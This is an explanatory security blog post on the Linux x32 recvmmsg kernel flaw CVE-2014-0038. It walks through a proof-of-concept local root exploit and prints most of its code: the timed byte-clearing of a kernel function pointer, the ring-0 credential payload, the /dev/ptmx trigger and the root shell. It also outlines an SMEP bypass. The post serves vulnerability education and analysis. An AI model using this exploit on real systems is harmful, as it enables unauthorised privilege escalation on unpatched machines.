How to exploit the x32 recvmmsg() kernel vulnerability CVE-2014-0038

http://blog.includesecurity.com/2014/03/exploit-CVE-2014-0038-x32-recvmmsg-kernel-vulnerablity.html

On January 31st, 2014, a post appeared on the oss-security mailing list [1] describing a bug in the Linux kernel implementation of the x32 recvmmsg syscall that could potentially lead to privilege escalation. It didn't take long for the first exploits to appear. In this blog post we'll walk through the vulnerability and Samuel's proof-of-concept exploit in detail.

The Vulnerable Linux Kernel Code

The bug is located in the x32 version of the recvmmsg syscall in the Linux kernel. The recvmmsg syscall allows for receiving multiple messages on a socket with just one syscall (and can thus increase performance in certain situations).

To be clear, the x32 ABI (not to be confused with the 32-bit x86 ABI) is a distinct ABI that is not enabled by default on all distributions. However, recent Ubuntu-based distributions as well as Arch Linux have enabled it. For more details on the x32 ABI refer to [2]. In short, x32 is an ABI that takes advantage of the 64-bit environment while using 32-bit pointers for less overhead. However, the x32 system calls can also be accessed by standard 64-bit applications by adding the value of __X32_SYSCALL_BIT to the system call number.
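To make the role of __X32_SYSCALL_BIT concrete, here is a minimal sketch of how such a number is formed. The helper names are ours and purely illustrative; the constant mirrors the kernel's definition (0x40000000). The example uses a call shared by both ABIs (39, getpid on x86_64); calls with a separate compat implementation may have their own numbers in the x32 table, so check the kernel's syscall table rather than relying on this sketch.

```c
#include <assert.h>
#include <stdint.h>

/* Same value as the kernel's __X32_SYSCALL_BIT; renamed so this sketch
 * builds without kernel headers. */
#define X32_SYSCALL_BIT 0x40000000u

/* Hypothetical helper: mark a syscall number as an x32 call. */
static uint32_t x32_syscall_nr(uint32_t nr)
{
    assert((nr & X32_SYSCALL_BIT) == 0); /* must not already be tagged */
    return nr | X32_SYSCALL_BIT;
}

/* Hypothetical helper: does this number select the x32 syscall table? */
static int is_x32_syscall(uint32_t nr)
{
    return (nr & X32_SYSCALL_BIT) != 0;
}
```

For example, x32_syscall_nr(39) yields 0x40000027, which a 64-bit process could pass to syscall() to reach the x32 entry point on a kernel built with x32 support.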

CVE-2014-0038 is a fairly classic case of trusting user-supplied input. The timeout pointer in the function below is passed directly from user space to __sys_recvmmsg, which expects a trusted kernel pointer, without first copying the structure it points to into a kernel space variable.
The following is the code which handles the recvmmsg syscall for the x32 ABI (net/compat.c):

asmlinkage long compat_sys_recvmmsg(int fd, struct compat_mmsghdr __user *mmsg,
                                    unsigned int vlen, unsigned int flags,
                                    struct compat_timespec __user *timeout)
{
        int datagrams;
        struct timespec ktspec;

        if (flags & MSG_CMSG_COMPAT)
                return -EINVAL;

        if (COMPAT_USE_64BIT_TIME)      /* set when doing the x32 syscall, the x32 ABI uses 64bit time values */
                return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,
                                      flags | MSG_CMSG_COMPAT,
                                      (struct timespec *) timeout);
/* ... */

Pointers passed from user space are marked with the __user attribute to make sure they are only accessed through the user space API functions (e.g. copy_to_user, copy_from_user, ...). In this case though, the timeout parameter is cast directly to a type not containing the __user attribute, and then passed on to __sys_recvmmsg without any further checks on it.
Compare this to what the normal x86_64 syscall does:

SYSCALL_DEFINE5(recvmmsg, int, fd, struct mmsghdr __user *, mmsg,
          unsigned int, vlen, unsigned int, flags,
          struct timespec __user *, timeout)
  {
      int datagrams;
      struct timespec timeout_sys;
      if (flags & MSG_CMSG_COMPAT)
          return -EINVAL;
      if (!timeout)
          return __sys_recvmmsg(fd, mmsg, vlen, flags, NULL);
/* -1- */
      if (copy_from_user(&timeout_sys, timeout, sizeof(timeout_sys)))
          return -EFAULT;
      datagrams = __sys_recvmmsg(fd, mmsg, vlen, flags, &timeout_sys);
      if (datagrams > 0 &&
          copy_to_user(timeout, &timeout_sys, sizeof(timeout_sys)))
          datagrams = -EFAULT;
      return datagrams;
  }

At -1- the timeout struct is copied into a kernel space variable before passing it to __sys_recvmmsg. That's the correct way to do it.

Digging Deeper Into the Vulnerability

First things first: the timespec structure, defined in include/uapi/linux/time.h:

struct timespec {
    long tv_sec;   /* seconds */
    long tv_nsec;  /* nanoseconds */
};

Now let's take a closer look at what happens to the timeout pointer passed from user space.
From compat_sys_recvmmsg the pointer is passed to __sys_recvmmsg, located in net/socket.c:

int __sys_recvmmsg(int fd, struct mmsghdr __user *mmsg, unsigned int vlen,
           unsigned int flags, struct timespec *timeout)
{
    if (timeout &&                                      /* -1- */
        poll_select_set_timeout(&end_time, timeout->tv_sec,
                    timeout->tv_nsec))
        return -EINVAL;
    /* ... */
    while (datagrams < vlen) {              /* -2- */
        /*
         * Basically just a loop calling recvmsg
         * until the timeout is hit or vlen messages have
         * been received.
         */
        if (MSG_CMSG_COMPAT & flags) {
            err = ___sys_recvmsg(sock, (struct msghdr __user *)compat_entry,
                         &msg_sys, flags & ~MSG_WAITFORONE,
                         datagrams);
            /* ... */
        } else {
            err = ___sys_recvmsg(sock,
                         (struct msghdr __user *)entry,
                         &msg_sys, flags & ~MSG_WAITFORONE,
                         datagrams);
            /* ... */
        }
        /* ... */
        if (timeout) {
            ktime_get_ts(timeout);          // put current time into *timeout
                                            // then subtract that from end_time
            *timeout = timespec_sub(end_time, *timeout);        /* -3- */
            if (timeout->tv_sec < 0) {                        
                timeout->tv_sec = timeout->tv_nsec = 0;         /* -4- */
                break;
            }
            /* Timeout, return less than vlen datagrams */
            if (timeout->tv_nsec == 0 && timeout->tv_sec == 0)
                break;
        }
    /* ... */

The first thing to note here is the block at -1-. Here poll_select_set_timeout will set end_time to the time when the timeout will be over. More importantly, it will check whether timeout points to a valid timespec struct. If it does not then it will return -EINVAL and thus cause the syscall to fail.
Here is the function performing the check (include/linux/time.h):

static inline bool timespec_valid(const struct timespec *ts)
{
    /* Dates before 1970 are bogus */
    if (ts->tv_sec < 0)                                 /* -5- */
        return false;
    /* Can't have more nanoseconds then a second */
    if ((unsigned long)ts->tv_nsec >= NSEC_PER_SEC)     /* -6- */   // include/linux/time.h: #define NSEC_PER_SEC 1000000000L
        return false;
    return true;
}

At -5- the first long, tv_sec, is checked to be non-negative, meaning its most significant byte must be smaller than 0x80, and at -6- the tv_nsec member is checked to be smaller than 1,000,000,000 ns (= 1 second), so tv_nsec must lie between 0 and 0x000000003b9ac9ff. Keep this in mind as we move on.
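To get a feeling for which memory passes this check, here is a small user-space replica applied to raw bytes. It is only a sketch: the function name is made up, and it assumes a little-endian host with 64-bit longs, as on x86_64.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

#define NSEC_PER_SEC 1000000000LL

/* Hypothetical user-space replica of the timespec_valid() check, applied
 * to 16 raw bytes at an arbitrary (possibly unaligned) address.
 * Assumes a little-endian host with 64-bit long, as on x86_64. */
static bool bytes_form_valid_timespec(const unsigned char *p)
{
    int64_t tv_sec, tv_nsec;

    assert(p != NULL);
    memcpy(&tv_sec, p, sizeof(tv_sec));        /* first long  */
    memcpy(&tv_nsec, p + 8, sizeof(tv_nsec));  /* second long */

    if (tv_sec < 0)                                 /* check -5- */
        return false;
    if ((uint64_t)tv_nsec >= (uint64_t)NSEC_PER_SEC) /* check -6- */
        return false;
    return true;
}
```

Feeding it a kernel pointer followed by zeroed memory shows that the start of the pointer fails the check (tv_sec is negative), while an address a few bytes into the pointer passes, because the zero bytes that follow end up in the upper part of tv_sec.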
Next the code enters the loop at -2-, waiting for incoming packets. After a packet has been received by ___sys_recvmsg the timeout struct is updated to contain the time left (-3-).

If that value is < 0, both tv_sec and tv_nsec are set to zero at -4- and the function returns.
The loop will thus exit if either vlen messages have been received or the timeout is hit after receiving a packet. Do note the call will only return after a packet has been received, even if the timeout has already been hit. By sending packets to ourselves from a forked child, we can enter the code that updates the timeout at any time. And by setting vlen to 1, we can guarantee that timeout is only written to once.

The Exploitation Vector

So what can we do with this situation from an exploitation perspective?

The basic idea that comes to mind is pointing the timeout pointer to sensitive kernel data with known content and waiting a specific amount of time until sending a UDP packet (thus reaching the block at -3- in the code above). This will cause the function to update the timeout structure and return.

In other words we will make the kernel treat some of its own memory (preferably a function pointer) as the timeout argument and thus cause the kernel to overwrite part of its own memory. This allows us to write a nearly arbitrary value to an address of our choosing (we have 64bit pointers so we can address the whole address space), as long as the original value is known and there is a valid timespec struct at that address.

Since kernel text and data pointers on x86_64 have their upper four bytes set to 0xff, they make a good target.
Imagine the following situation:

pointer: 0xffffffff44434241               uninitialized data
     (little endian)
+-------------------------+-------------------------+-------------------------+
| 41 42 43 44 ff ff ff ff | 00 00 00 00 00 00 00 00 | 00 00 00 00 00 00 00 00 |
+-------------------------+-------------------------+-------------------------+
                       ^ point timeout here
                       [-------- tv_sec -------] [------- tv_nsec -------]

If the address of the last (most significant) byte of the pointer is passed as the timeout, tv_sec reads as 0xff (255 seconds) and tv_nsec as 0. Waiting >= 255 seconds before sending the packet will then clear that byte without mangling adjacent data, as the whole 16-byte block is set to zero. Repeating this for the next two bytes will allow us to point that pointer into user space (this is what the original version of the exploit did).

To speed things up the bytes can be cleared in parallel. For this to work the time between the syscall and the incoming packet must be > 254s and < 255s, so that the remaining time written back has 0x00 in its least significant byte while the higher bytes of tv_sec keep their value. This will cause the recvmmsg function to write garbage to the following two longs, as they are treated as the tv_nsec value and will then contain the remaining nanoseconds of the timeout.
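The arithmetic behind that timing window can be checked with a small user-space model of the write-back at -3- and -4-. This is a sketch under our own assumptions: struct ts64 and remaining_timeout() are illustrative names, and the elapsed time is passed in directly instead of being measured.

```c
#include <assert.h>
#include <stdint.h>

#define NSEC_PER_SEC 1000000000LL

struct ts64 {            /* stand-in for struct timespec on x86_64 */
    int64_t tv_sec;
    int64_t tv_nsec;
};

/* Hypothetical model of the timeout update: returns what would be written
 * back when a packet arrives elapsed_ns after the syscall was entered. */
static struct ts64 remaining_timeout(struct ts64 initial, int64_t elapsed_ns)
{
    struct ts64 left = {0, 0};
    int64_t total_ns;

    assert(elapsed_ns >= 0);
    /* Fine for the small tv_sec values used here; a huge tv_sec would overflow. */
    total_ns = initial.tv_sec * NSEC_PER_SEC + initial.tv_nsec - elapsed_ns;
    if (total_ns < 0)
        return left;                       /* clamped to zero, as at -4- */
    left.tv_sec  = total_ns / NSEC_PER_SEC;
    left.tv_nsec = total_ns % NSEC_PER_SEC;
    return left;
}
```

With an initial tv_sec of 0xffffff and 254.5 seconds elapsed, the model returns a tv_sec of 0xffff00: only the lowest byte changed. The half second that is left over lands in tv_nsec, which is the garbage mentioned above.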

A Walk-through of the Proof-of-concept Exploit

Now let's start with a brief overview on the steps the exploit takes to get root privileges.
The exploit follows the common scheme of tricking the kernel into executing code in user space memory. This has quite a few advantages, including being able to write the payload in nicely readable C code. For a more detailed discussion of this technique refer to [3].

Here are the basic steps:

Allocate executable and writable memory at the address to which the kernel will jump, and copy the kernel payload at the end of that region.

Target the release function pointer of the ptmx_fops structure located in the .data section which is writable kernel memory. Zero out the three most significant bytes, thereby turning it into a pointer inside of the region mapped by user space.

Open /dev/ptmx and close it, causing ptmx_fops->release() to be called.

Check if root privileges were obtained and start a shell.

Let's examine each of those steps in more detail.

Resolving symbols

The exploit needs four kernel symbols to be resolved:

#define PTMX_FOPS           0xffffffff81fb30c0LL
#define TTY_RELEASE         0xffffffff8142fec0LL
#define COMMIT_CREDS        0xffffffff8108ad40LL
#define PREPARE_KERNEL_CRED 0xffffffff8108b010LL

They can be taken from /boot/System.map or the decompressed kernel image via nm.
The PoC linked at the end of this post also contains a script (build.sh) which helps with resolving the symbols. The README in the PoC provides details on how to use it.

Setting things up

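/* Prepare payload... */
printf("preparing payload buffer...\n");
/* 7 = PROT_READ | PROT_WRITE | PROT_EXEC, 0x32 = MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS */
code = (long)mmap((void*)(TTY_RELEASE & 0x000000fffffff000LL), PAYLOADSIZE, 7, 0x32, 0, 0);
memset((void*)code, 0x90, PAYLOADSIZE);      /* fill the region with nops */
code += PAYLOADSIZE - 1024;
memcpy((void*)code, &kernel_payload, 1024);  /* payload goes into the last 1024 bytes */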

The first thing the exploit does is allocate executable and writable memory at a fixed address. TTY_RELEASE is the original value of the targeted pointer in kernel space. Since the three most significant bytes of that pointer will be cleared, a mask of 0x000000fffffff000 has to be applied to it. The mask also clears the low 12 bits, so the mapping starts on a page boundary.
The memory region is then filled with nops and the kernel payload (discussed later) is copied into it.
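The address arithmetic can be verified in isolation. The following sketch uses two illustrative helpers of our own (they are not part of the PoC) and does not model PAYLOADSIZE:

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper: clear the n most significant bytes of a 64-bit value. */
static uint64_t clear_top_bytes(uint64_t ptr, unsigned n)
{
    assert(n <= 8);
    if (n == 0)
        return ptr;
    if (n == 8)
        return 0;
    return ptr & (~0ULL >> (8 * n));
}

/* Hypothetical helper: apply the mask used for the mmap() base address. */
static uint64_t map_base(uint64_t ptr)
{
    return ptr & 0x000000fffffff000ULL;
}
```

For the TTY_RELEASE value listed above (0xffffffff8142fec0), clearing three bytes gives 0x000000ff8142fec0 and the mapping base is 0x000000ff8142f000, so the modified pointer lands 0xec0 bytes into the mapped region, inside the nop fill.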

The target

/*
 * Now clear the three most significant bytes of the fops pointer
 * to the release function.
 * This will make it point into the memory region mapped above.
 */
printf("changing kernel pointer to point into controlled buffer...\n");
target = PTMX_FOPS + FOPS_RELEASE_OFFSET;
for (i = 0; i < 3; i++) {
    pids[i] = fork();
    if (pids[i] == 0) {
        zero_out(target + (5 + i));
        exit(EXIT_SUCCESS);
    }
    sleep(1);
}

The pointer targeted in the exploit is the release function pointer of the ptmx_fops structure, which originally points to tty_release. In the Linux kernel the file_operations structure contains a bunch of function pointers to be executed when user space accesses the associated file. Examples include open, release, write, ... ptmx_fops->release is called when the last reference to that file descriptor is released. The two pointers following release are not initialized (= 0) and will thus be valid tv_nsec values. The situation is then similar to the one depicted in the diagram shown in the "Exploitation Vector" section. User space can map 0x000000ffxxxxxxxx, meaning only 3 of the 4 high order bytes of the pointer need to be cleared. To speed things up three additional processes are forked, each one clearing a byte of the pointer. (Note: The sleep(1) between each fork is done here to guarantee a different seed for srand() in each child. This is needed so every child opens a different UDP port.)
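For readers unfamiliar with this dispatch pattern, here is a toy user-space model. None of these names exist in the kernel; the struct is a heavily simplified stand-in for file_operations that keeps only the idea of a release pointer followed by two unused slots.

```c
#include <assert.h>
#include <stddef.h>

struct toy_file;

/* Toy stand-in for a file_operations table. */
struct toy_file_operations {
    int (*open)(struct toy_file *);
    int (*release)(struct toy_file *);
    void *unused_a;   /* stand-ins for the two NULL slots after release */
    void *unused_b;
};

struct toy_file {
    const struct toy_file_operations *f_op;
    int release_calls;
};

static int toy_release(struct toy_file *f)
{
    f->release_calls++;
    return 0;
}

/* Dropping the last reference dispatches through the table. */
static int toy_close(struct toy_file *f)
{
    assert(f != NULL);
    if (f->f_op && f->f_op->release)
        return f->f_op->release(f);
    return 0;
}
```

Whatever address is stored in the release slot is what gets called on close, which is why changing that one pointer is enough to redirect execution.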

Exploiting the bug

void zero_out(long addr)
{
    int sockfd, retval, port, pid, i;
    struct sockaddr_in sa;
    char buf[BUFSIZE];
    struct mmsghdr msgs;
    struct iovec iovecs;
    srand(time(NULL));
    port = 1024 + (rand() % (0x10000 - 1024));
    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd == -1) {
        perror("socket()");
        exit(EXIT_FAILURE);
    }
    sa.sin_family      = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port        = htons(port);
    if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
        perror("bind()");
        exit(EXIT_FAILURE);
    }
    memset(&msgs, 0, sizeof(msgs));
    iovecs.iov_base         = buf;
    iovecs.iov_len          = BUFSIZE;
    msgs.msg_hdr.msg_iov    = &iovecs;
    msgs.msg_hdr.msg_iovlen = 1;
    /*
     * Start a separate process that sends a UDP message shortly before 255 seconds
     * have elapsed, so the syscall returns, but not before updating the timeout
     * struct and writing the remaining time into it.
     * 0xff - 255 seconds = 0x00
     */
    printf("clearing byte at 0x%lx\n", addr);
    pid = fork();
    if (pid == 0) {
        memset(buf, 0x41, BUFSIZE);
        if ((sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
            perror("socket()");
            exit(EXIT_FAILURE);
        }
        sa.sin_family      = AF_INET;
        sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
        sa.sin_port        = htons(port);
        sleep(0xfe);
        printf("waking up parent...\n");
        sendto(sockfd, buf, BUFSIZE, 0, (struct sockaddr *) &sa, sizeof(sa));       /* -1- */
        exit(EXIT_SUCCESS);
    } else if (pid > 0) {
        retval = syscall(__NR_recvmmsg, sockfd, &msgs, 1, 0, (void*)addr);          /* -2- */
        if (retval == -1) {
            printf("address can't be written to, not a valid timespec struct!\n");
            exit(EXIT_FAILURE);
        }
        waitpid(pid, 0, 0);
        printf("byte zeroed out\n");
    } else {
      perror("fork()");
      exit(EXIT_FAILURE);
    }
}

This is the key part of the exploit, where we abuse the bug as discussed in the "Exploitation Vector" section. After a lot of code to set up the structures needed for the syscall, the passed address is used as the timeout pointer (-2-), so the targeted byte becomes the least significant byte of tv_sec, and the vulnerable syscall is called.
At -1- the forked child process wakes its parent so that the time difference between the syscall and the incoming packet is between 254 and 255 seconds, thus setting the least significant byte of the tv_sec member to 0.
Keep in mind that this function is executed by three child processes. The memory at the address of ptmx_fops->release roughly looks like this at the beginning:

     release pointer             uninitialized            uninitialized
+-------------------------+-------------------------+-------------------------+
| c0 fe 42 81 ff ff ff ff | 00 00 00 00 00 00 00 00 | 00 00 00 00 00 00 00 00 |
+-------------------------+-------------------------+-------------------------+
                       ^ address for child 3
                    ^ address for child 2
                 ^ address for child 1

Turning it into:

     release pointer               mangled                  mangled
+-------------------------+-------------------------+-------------------------+
| c0 fe 42 81 ff 00 00 00 | 00 00 00 00 00 xx xx xx | xx xx xx 00 00 00 00 00 |
+-------------------------+-------------------------+-------------------------+

ptmx_fops->release now points into the memory region that was mapped at the beginning.
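The overlapping writes are easier to follow in a simulation on an ordinary byte buffer. The sketch below is a user-space model, not part of the PoC: all names are ours, it assumes a little-endian host, and it assumes every call sees the same elapsed time, with all three calls entered before the first one completes (which matches the one-second stagger). Which bytes of the following longs end up mangled depends on the exact timing.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define NSEC_PER_SEC 1000000000LL

struct pending {      /* what one call captured at syscall entry */
    size_t  off;      /* byte offset used as the timeout "pointer" */
    int64_t tv_sec;
    int64_t tv_nsec;
};

static int64_t load64(const unsigned char *p)
{
    int64_t v;
    memcpy(&v, p, sizeof(v));
    return v;
}

static void store64(unsigned char *p, int64_t v)
{
    memcpy(p, &v, sizeof(v));
}

/* Syscall entry: the timeout is read from memory once. */
static struct pending enter_call(const unsigned char *mem, size_t off)
{
    struct pending c = { off, load64(mem + off), load64(mem + off + 8) };
    return c;
}

/* Packet arrival: the remaining time is written back to the same place. */
static void complete_call(unsigned char *mem, struct pending c, int64_t elapsed_ns)
{
    int64_t total_ns = c.tv_sec * NSEC_PER_SEC + c.tv_nsec - elapsed_ns;

    if (total_ns < 0)
        total_ns = 0;                          /* clamp, as at -4- */
    store64(mem + c.off, total_ns / NSEC_PER_SEC);
    store64(mem + c.off + 8, total_ns % NSEC_PER_SEC);
}

/* mem must hold at least 24 bytes: the pointer plus the two longs after it. */
static void simulate_parallel_clear(unsigned char *mem, int64_t elapsed_ns)
{
    struct pending calls[3];
    int i;

    assert(elapsed_ns >= 0);
    for (i = 0; i < 3; i++)                    /* children 1..3 enter the syscall */
        calls[i] = enter_call(mem, 5 + (size_t)i);
    for (i = 0; i < 3; i++)                    /* packets arrive in the same order */
        complete_call(mem, calls[i], elapsed_ns);
}
```

Starting from the bytes c0 fe 42 81 ff ff ff ff followed by 16 zero bytes and an elapsed time of 254.5 seconds, the first 8 bytes read back as 0x000000ff8142fec0 afterwards.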

Code execution in Ring 0

/* ... and trigger. */
printf("releasing file descriptor to call manipulated pointer in kernel mode...\n");
pwn = open("/dev/ptmx", O_RDWR);
close(pwn);

At this point we are ready to execute our payload in ring 0 by opening a file descriptor to /dev/ptmx and immediately closing it, causing the kernel to call ptmx_fops->release in the current context.
Now if all goes well (see restrictions further down) the kernel will jump to our code, change the creds structure of our process to a new one with root privileges (and all capabilities) and return to user mode.
Let's take a closer look at how that is done next.

Kernel payload

int __attribute__((regparm(3)))
kernel_payload(void* foo, void* bar)
{
    _commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
    _prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;
    /* restore function pointer and following two longs */
    *((int*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 4)) = -1;
    *((long*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 8)) = 0;
    *((long*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 16)) = 0;
    /* escalate to root */
    commit_creds(prepare_kernel_cred(0));
    return -1;
}

This is the function copied into the end of the allocated buffer at the beginning. The kernel will execute this code during the close syscall and then return to user space. The kernel payload uses an old approach which has been documented by Brad Spengler (spender) in his enlightenment framework [4] (see exploit.c).

Basically, after restoring the manipulated memory region, a new cred structure with full privileges is allocated by prepare_kernel_cred and afterwards passed to commit_creds to install it on the current task. Since the exploit needs to resolve the tty_release and ptmx_fops symbols anyway, this approach was chosen.

It would also be possible to change the credentials without calling any helper functions in the kernel.
This can be done by looking for a pointer to the cred structure stored in the task_struct for the current process, which can in turn be found at the beginning of the kernel stack.
By searching for memory that contains the current process uid and gid and setting those to zero, root privileges can be acquired as well.
For an example demonstrating this technique refer to the semtex.c exploit [5].

Finishing

if (getuid() != 0) {
    printf("failed to get root :(\n");
    exit(EXIT_FAILURE);
}
printf("got root, enjoy :)\n");
return execl("/bin/bash", "-sh", (char *)NULL);

Some notes on reliability

Since the exploit relies on timing it might be unreliable if the exploited system is under very heavy load.
If the kernel fails to schedule the child process in time to wake up its parent (meaning within a second), the pointer will get corrupted and the exploit will fail, causing a kernel Oops.
In this case a sequential exploit, which clears the bytes one after another, can be used. It waits the full 255 seconds for each byte, which guarantees that the whole timespec structure is zeroed out when the parent is woken up. This approach takes 3 times longer than the parallel version though, so approximately 13 minutes [6]. I have tested the parallel version on a system under heavy load (100% CPU usage) multiple times and have not seen the exploit fail, so I assume this to be more of a theoretical issue (setting up the sockets and rescheduling a process within one second is really no big deal, even under stress).

In theory, the original sequential version of this exploit is more reliable than the parallel version, but it takes considerably longer to run.

Exploit restrictions

Since the exploit tricks the kernel into executing user space pages it can be stopped by SMEP [7]. SMEP will cause the CPU to generate a fault if it is executing code from a user space page in kernel mode. Think of SMEP as kind of a DEP/NX for the kernel. To bypass SMEP, bit 20 of CR4 (counting from 0) can be cleared through a ROP chain. Afterwards executing code in user space is possible. This technique is described in further detail in [8]. If no gadgets can be found for writing to the CR4 register, exploitation would still be possible by writing the entire payload as a ROP chain.
Also see the post in [9].
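To pin down which bit is meant, here is the mask arithmetic on an ordinary integer. This is only an illustration: the helper names are ours, the sample value is arbitrary, and no control register is read or written.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define CR4_SMEP_BIT 20u   /* bit index of SMEP in CR4, counting from 0 */

/* Hypothetical helper: build a single-bit mask. */
static uint64_t bit_mask(unsigned bit)
{
    assert(bit < 64);
    return 1ULL << bit;
}

/* Is the SMEP bit set in this (copy of a) CR4 value? */
static bool cr4_has_smep(uint64_t cr4)
{
    return (cr4 & bit_mask(CR4_SMEP_BIT)) != 0;
}

/* The same value with only the SMEP bit cleared. */
static uint64_t cr4_without_smep(uint64_t cr4)
{
    return cr4 & ~bit_mask(CR4_SMEP_BIT);
}
```

The mask is 0x100000, so an example value of 0x1406f0 becomes 0x0406f0 with SMEP cleared.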

That's it, find the full proof-of-concept exploit code at:
https://github.com/saelo/cve-2014-0038

If you have interesting optimizations or alternative implementations let us know via email info/atincludesecurity.com

References

[1] http://seclists.org/oss-sec/2014/q1/187
[2] http://en.wikipedia.org/wiki/x32_ABI
[3] http://www.phrack.org/issues.html?id=6&issue=64
[4] http://grsecurity.net/~spender/exploits/enlightenment.tgz
[5] http://packetstormsecurity.com/files/121616/semtex.c
[6] http://pastebin.com/DH3Lbg54
[7] http://en.wikipedia.org/wiki/Control_register#CR4
[8] http://blog.ptsecurity.com/2012/09/bypassing-intel-smep-on-windows-8-x64.html
[9] http://vulnfactory.org/blog/2011/06/05/smep-what-is-it-and-how-to-beat-it-on-linux